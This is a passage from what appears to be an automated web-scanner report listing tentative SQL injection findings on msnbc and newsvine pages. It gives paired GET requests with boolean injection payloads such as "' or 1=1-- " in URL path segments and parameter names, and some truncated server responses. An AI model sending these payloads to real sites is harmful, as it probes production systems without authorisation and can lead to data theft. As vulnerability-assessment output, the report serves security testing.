GET /id/41164445/ns/world_news-africa'%20and%201%3d2--%20/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.113. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/41164445/ns/world_news-africa/

Issue detail

Request 1

GET /id/41164445/ns/world_news-africa/?1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/41164445/ns/world_news-africa/?1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.114. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/41323843/ns/world_news-mideastn_africa/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 10493613'%20or%201%3d1--%20 and 10493613'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41323843/ns10493613'%20or%201%3d1--%20/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/41323843/ns10493613'%20or%201%3d2--%20/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.115. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/41323843/ns/world_news-mideastn_africa/

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 25334761'%20or%201%3d1--%20 and 25334761'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41323843/ns/world_news-mideastn_africa25334761'%20or%201%3d1--%20/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/41323843/ns/world_news-mideastn_africa25334761'%20or%201%3d2--%20/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.116. http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/41324344/ns/world_news-south_and_central_asia/

Issue detail

Request 1

GET /id/41324344%20and%201%3d1--%20/ns/world_news-south_and_central_asia/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/41324344%20and%201%3d2--%20/ns/world_news-south_and_central_asia/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.117. http://www.msnbc.redacted/id/41326456/ns/business-media_biz/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/41326456/ns/business-media_biz/

Issue detail

Request 1

GET /id/41326456/ns/business-media_biz/?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/41326456/ns/business-media_biz/?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.118. http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/41326705/ns/world_news-south_and_central_asia/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 22723550%20or%201%3d1--%20 and 22723550%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41326705/ns/world_news-south_and_central_asia/?122723550%20or%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/41326705/ns/world_news-south_and_central_asia/?122723550%20or%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.119. http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/41327238/ns/us_news-crime_and_courts/

Issue detail

Request 1

GET /id/41327238/ns'%20and%201%3d1--%20/us_news-crime_and_courts/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/41327238/ns'%20and%201%3d2--%20/us_news-crime_and_courts/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.120. http://www.msnbc.redacted/id/41327817/ns/world_news-mideastn_africa/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/41327817/ns/world_news-mideastn_africa/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13122174%20or%201%3d1--%20 and 13122174%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41327817/ns/world_news-mideastn_africa/?113122174%20or%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/41327817/ns/world_news-mideastn_africa/?113122174%20or%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.121. http://www.msnbc.redacted/id/41327924/ns/world_news-europe/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/41327924/ns/world_news-europe/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16798619'%20or%201%3d1--%20 and 16798619'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41327924/ns16798619'%20or%201%3d1--%20/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/41327924/ns16798619'%20or%201%3d2--%20/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.122. http://www.msnbc.redacted/id/41327924/ns/world_news-europe/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/41327924/ns/world_news-europe/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 43673560%20or%201%3d1--%20 and 43673560%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41327924/ns/world_news-europe/?143673560%20or%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/41327924/ns/world_news-europe/?143673560%20or%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.123. http://www.msnbc.redacted/id/41328059/ns/us_news/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/41328059/ns/us_news/

Issue detail

Request 1

GET /id/41328059/ns/us_news/?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/41328059/ns/us_news/?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.124. http://www.msnbc.redacted/id/41328834/ns/world_news-europe/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/41328834/ns/world_news-europe/

Issue detail

Request 1

GET /id/41328834/ns'%20and%201%3d1--%20/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/41328834/ns'%20and%201%3d2--%20/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.125. http://www.msnbc.redacted/id/41330515/ns/us_news-life/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/41330515/ns/us_news-life/

Issue detail

Request 1

GET /id/41330515'%20and%201%3d1--%20/ns/us_news-life/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/41330515'%20and%201%3d2--%20/ns/us_news-life/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.126. http://www.msnbc.redacted/id/41330876/ns/world_news-europe/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/41330876/ns/world_news-europe/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 85220830'%20or%201%3d1--%20 and 85220830'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id85220830'%20or%201%3d1--%20/41330876/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Cnection: close
Content-Length: 1245
Date: Sun, 30 Jan 2011 01:55:47 GMT
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">

</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>

Request 2

GET /id85220830'%20or%201%3d2--%20/41330876/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 99480

<html xmlns:tvservices="http://www.msnbc.com"><head><title>Page not found - About- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="stylesheet" type="text/css" href="/default.ashx/id/21589549" /><link rel="stylesheet" type="text/css" href="/default.ashx/id/21731378" /><script type="text/javascript" src="/js/std.js"></script><script type="text/javascript" src="/id/23149822"></script><script type="text/javascript">gEnabled=false;</script><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta http-equiv="pics-label" content="(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.msnbc.redacted" r (nz 1vz 1lz 1oz 1cz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.msnbc.redacted" r (l 0n 0s 0v 0))"><meta name="robots" content="noindex"><meta name="description" content="Error 404"><meta name="Search.Document" content="story"><meta name="Search.Title" content="We cannot find the page you requested."><meta name="Search.Updated" content="Thu, 11 Mar 2010 22:11:14 GMT"><meta name="Search.Expires" content="Fri, 31 Dec 9999 23:59:59 GMT"><meta name="GOOGLEBOT" content="unavailable_after: 31-Dec-9999 23:59:59 GMT"><meta name="Search.Section" content="About"><link rel="alternate" type="application/rss+xml" title="MSNBC - Top msnbc.com headlines" href="http://www.msnbc.redacted/id/3032091/device/rss/rss.xml" xmlns:media="http://search.yahoo.com/mrss/" /><link rel="alternate" type="application/rss+xml" title="MSNBC - Top Stories" href="http://rss.msnbc.redacted/id/3032091/device/rss/rss.xml"><script language="javascript" type="text/javascript">
this.nm_bo = function (o)
{
//newsmenu delay
if (nm_Enter)
{
window.clearTimeout(nm_Enter);
nm_Enter = 0;
}
// Get initiating button
if (o)
{
o2 = o.relatedTarget;
o = o.target;
}
else
{
o = window.event.srcElement;
o2 = window.ev
...[SNIP]...

1.127. http://www.msnbc.redacted/id/41330876/ns/world_news-europe/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/41330876/ns/world_news-europe/

Issue detail

Request 1

GET /id/41330876/ns/world_news-europe/?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/41330876/ns/world_news-europe/?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.128. http://www.msnbc.redacted/id/8004316/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/8004316/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 42860396'%20or%201%3d1--%20 and 42860396'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/8004316/?142860396'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sun, 30 Jan 2011 01:59:31 GMT
Date: Sun, 30 Jan 2011 01:59:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 163390

<html><head><title>Top Videos - Videos & Clips of Top News Stories & Headlines - msnbc.com- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="styleshe
...[SNIP]...
<img src="http://c.redacted/c.gif?NC=1180&NA=1154&PS=69715&PI=7329&DI=305&TP=http%3a%2f%2fmsnbc.msn.com%2fid%2f8004316%2f
&RID=76faf60ebb3048f380f19f80f363b3cb" width="0" height="0" border="0" alt="" /><div id="nm_c1" class="nmX"> </div><div id="nm_c2" class="nmX"> </div><div id="nm_c3" class="nmX"> </div><div id="nm_c4" class="nmX"> </div>
<script language="JavaScript" type="text/javascript">
var tpValue='http%3a%2f%2fmsnbc.redacted%2fid%2f8004316%2f';
var psValue='NC=1255&NA=1154&PS=69715&PI=7329&DI=305';
psValue=psValue.substr(psValue.indexOf("PS="));
psValue=psValue.substr(3,psValue.indexOf("&")-3);
var diValue='NC=1255&NA=1154&PS=69715&PI=7329&DI=305';
diValue=diValue.substr(diValue.indexOf("DI="));
diValue=diValue.substr(3);
var piValue='NC=1255&NA=1154&PS=69715&PI=7329&DI=305';
piValue=piValue.substr(piValue.indexOf("PI="));
piValue=piValue.substr(3,piValue.indexOf("&")-3);

$.track({trackInfoOpts:{sitePage:{pageName:s_msn.pageName,domainId:diValue,propertyId:piValue,propertySpecific:psValue,sourceUrl:document.URL,tp:'http%3a%2f%2fmsnbc.redacted%2fid%2f8004316%2f',referrer:document.referrer},userStatic:{requestId:'76faf60ebb3048f380f19f80f363b3cb'}},spinTimeout:150})
.register(new $.track.genericTracking({base:"http://udc.redacted/c.gif?",linkTrack:0,commonMap:{sitePage:{di:'domainId',pn:'pageName',pi:'propertyId',ps:'propertySpecific',su:'sourceUrl',cu:'tp'} ,
userStatic:{rid:'requestId',clid:'requestId'},
client:{rf:'referrer',bh:'height',bw:'width',scr:'screenResolution',sd:'colorDepth'}},impr:{param:{evt:'impr',js:'1'}}}));
</script><script type="text/javascript">
$.track.trackPage();
</script><div style="display:none;">
<script type="text/javascript">
var axel = Math.random() + "";
var a = axel * 10000000000000;
document.write('<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=' + a + '?" width="1" height="1" alt=""/>');
</script>
<noscript>
<img src="http://ad.doubleclick.ne
...[SNIP]...

Request 2

GET /id/8004316/?142860396'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sun, 30 Jan 2011 01:59:32 GMT
Date: Sun, 30 Jan 2011 01:59:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 165323

<html><head><title>Top Videos - Videos & Clips of Top News Stories & Headlines - msnbc.com- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="styleshe
...[SNIP]...
<img src="http://c.redacted/c.gif?NC=1180&NA=1154&PS=69715&PI=7329&DI=305&TP=http%3a%2f%2fmsnbc.msn.com%2fid%2f8004316%2f
&RID=c70c5131d3b644bfbb8884572e01c494" width="0" height="0" border="0" alt="" /><div id="nm_c1" class="nmX"> </div><div id="nm_c2" class="nmX"> </div><div id="nm_c3" class="nmX"> </div><div id="nm_c4" class="nmX"> </div>
<script language="JavaScript" type="text/javascript">
var tpValue='http%3a%2f%2fmsnbc.redacted%2fid%2f8004316%2f';
var psValue='NC=1255&NA=1154&PS=69715&PI=7329&DI=305';
psValue=psValue.substr(psValue.indexOf("PS="));
psValue=psValue.substr(3,psValue.indexOf("&")-3);
var diValue='NC=1255&NA=1154&PS=69715&PI=7329&DI=305';
diValue=diValue.substr(diValue.indexOf("DI="));
diValue=diValue.substr(3);
var piValue='NC=1255&NA=1154&PS=69715&PI=7329&DI=305';
piValue=piValue.substr(piValue.indexOf("PI="));
piValue=piValue.substr(3,piValue.indexOf("&")-3);

$.track({trackInfoOpts:{sitePage:{pageName:s_msn.pageName,domainId:diValue,propertyId:piValue,propertySpecific:psValue,sourceUrl:document.URL,tp:'http%3a%2f%2fmsnbc.redacted%2fid%2f8004316%2f',referrer:document.referrer},userStatic:{requestId:'c70c5131d3b644bfbb8884572e01c494'}},spinTimeout:150})
.register(new $.track.genericTracking({base:"http://udc.redacted/c.gif?",linkTrack:0,commonMap:{sitePage:{di:'domainId',pn:'pageName',pi:'propertyId',ps:'propertySpecific',su:'sourceUrl',cu:'tp'} ,
userStatic:{rid:'requestId',clid:'requestId'},
client:{rf:'referrer',bh:'height',bw:'width',scr:'screenResolution',sd:'colorDepth'}},impr:{param:{evt:'impr',js:'1'}}}));
</script><script type="text/javascript">
$.track.trackPage();
</script><div style="display:none;">
<script type="text/javascript">
var axel = Math.random() + "";
var a = axel * 10000000000000;
document.write('<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=' + a + '?" width="1" height="1" alt=""/>');
</script>
<noscript>
<img src="http://ad.doubleclick.ne
...[SNIP]...

1.129. http://www.polls.newsvine.com/_nv/cms/help/faq [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/help/faq

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 77049328'%20or%201%3d1--%20 and 77049328'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_nv/cms/help77049328'%20or%201%3d1--%20/faq HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:19:10 GMT
Content-Length: 15052
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&x=0|26&get=error-page&rand=1199522382&do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&x=0|26&get=error-page&rand=1199522382&do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.co
...[SNIP]...

Request 2

GET /_nv/cms/help77049328'%20or%201%3d2--%20/faq HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:19:10 GMT
Content-Length: 15042
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&x=0|26&get=error-page&rand=908514525&do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&x=0|26&get=error-page&rand=908514525&do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
